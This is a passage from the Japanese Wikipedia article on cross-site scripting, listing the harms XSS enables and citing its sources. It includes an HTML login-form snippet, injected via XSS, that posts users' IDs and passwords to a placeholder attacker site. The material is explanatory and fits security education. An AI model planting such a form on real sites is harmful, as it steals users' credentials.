クロスサイトスクリプティング XSSの被害

ウィキペディア

クロスサイトスクリプティング

出典: フリー百科事典『ウィキペディア（Wikipedia）』 (2023/07/21 10:00 UTC 版)

XSSの被害

この節の加筆が望まれています。 （2016年10月）

攻撃者はXSSを用いることで、例えば以下の様な被害を発生させられる：

• 標的サイトの変数値やcookieなどからの情報漏洩^[1][3]
• セッションハイジャック^[3]
• 機能の不正実行^[3]
• ウェブサイトの改竄（ただし攻撃者が準備したURLからアクセスした場合のみ）^[3]
• 悪意のあるスクリプトによりWebページを改ざんする事でパスワードやクレジットカード番号を入力するフォームをWebページに追加し、ユーザからこれらの情報を盗む（フィッシング 詐欺）^[1]
• 悪意のあるスクリプトを使ってブラウザの脆弱性を突き、ユーザ端末を乗っ取る^[1]
• ワームの実行^[3]

個人情報の奪取

攻撃者は標的サイトexample.comで任意のスクリプトを実行可能なので例えばスクリプトに以下の様なhtmlのフォームを生成させる事でユーザが入力したID/パスワードを攻撃者のサイトに転送させる事ができる：

ログインしてください：<br />
<form name=login action="（攻撃者のサイト名）" method="post">
   ID <input type="text" name="id"> <br />
   パスワード <input type="text" name="pass"> <br />
</form>

脚注

1. ^ ^{a b c d e f g h i j k l m n o p q r s} CWE-79 2011.
2. ^ 共通脆弱性タイプ一覧CWE概説。IPA
3. ^ ^{a b c d e f g h} 金床 2007, p. 3章冒頭部.
4. ^ IT用語辞典e-words「クロスサイトスクリプティング」 2016/09/12閲覧
5. ^ ^{a b c} 金床 2007, p. 3章『攻撃の概要』節.
6. ^ ^{a b c d e f g} IPA 2014.
7. ^ ^{a b c d} IPA 2011.
8. ^ 金床 2007, p. 第三章「攻撃の概要」節.
9. ^ ^{a b} 徳丸 2011, p. 91.
10. ^ ^{a b c d} 徳丸 2011, p. 106.
11. ^ IPA 2015, p. 22-29.
12. ^ ^{a b} IPA 2013, p. 5-8.
13. ^ IPA 2013, p. 10.
14. ^ “あまり知られていない脆弱性：DOM Based XSSにご用心”. アークウェブ (2007年2月16日). 2016年9月12日閲覧。
15. ^ 徳丸 2011, p. 100-101.